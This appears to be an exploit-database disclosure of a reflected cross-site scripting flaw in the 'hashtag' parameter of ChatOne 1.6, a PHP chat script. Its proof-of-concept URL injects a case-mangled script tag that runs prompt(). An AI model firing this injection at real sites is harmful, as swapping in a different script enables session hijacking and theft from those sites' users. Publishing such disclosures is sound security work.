# Exploit Title: ChatOne 1.6 - 'hashtag' Cross-Site Scripting
# Google Dork: N/A
# Date: 2018-08-16
# Exploit Author: Ali Alipour
# Vendor Homepage: https://codecanyon.net/item/chatone-social-networking-php-script/20737789
# Software Link Download : http://dl.20script.ir/script/chat/chatone[www.20script.ir].zip
# Version: 1.6
# Tested on: Kali Linux / Windows 10
Vulnerable Parameter Type: GET
Vulnerable Parameter: http://localhost/chat/hashtag?hashtag=[XSS]
# Proof of Concepts:
[ chat/hashtag?hashtag='%22()%26%25<acx><ScRiPt%20>prompt('Ali Alipour')</ScRiPt> ]
http://localhost/chat/hashtag?hashtag='%22()%26%25<acx><ScRiPt%20>prompt('Ali Alipour')</ScRiPt>